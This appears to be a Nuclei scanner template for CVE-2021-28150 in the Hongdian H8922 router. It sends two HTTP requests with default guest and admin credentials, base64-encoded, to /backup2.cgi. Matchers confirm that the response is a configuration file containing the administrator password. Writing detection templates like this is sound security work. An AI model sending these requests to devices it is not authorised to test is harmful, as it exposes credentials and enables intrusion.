id: CVE-2021-28150 info: name: Hongdian H8922 3.0.5 - Information Disclosure author: gy741 severity: medium description: Hongdian H8922 3.0.5 is susceptible to information disclosure. An attacker can access cli.conf (with the administrator password and other sensitive data) via /backup2.cgi and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - http://en.hongdian.com/Products/Details/H8922 - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.5 cve-id: CVE-2021-28150 cwe-id: CWE-20 epss-score: 0.00339 tags: cve,cve2021,hongdian,exposure metadata: max-request: 2 http: - raw: - | GET /backup2.cgi HTTP/1.1 Host: {{Hostname}} Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - | GET /backup2.cgi HTTP/1.1 Host: {{Hostname}} Authorization: Basic YWRtaW46YWRtaW4= matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "application/octet-stream" part: header - type: word words: - "CLI configuration saved from vty" - "service webadmin" part: body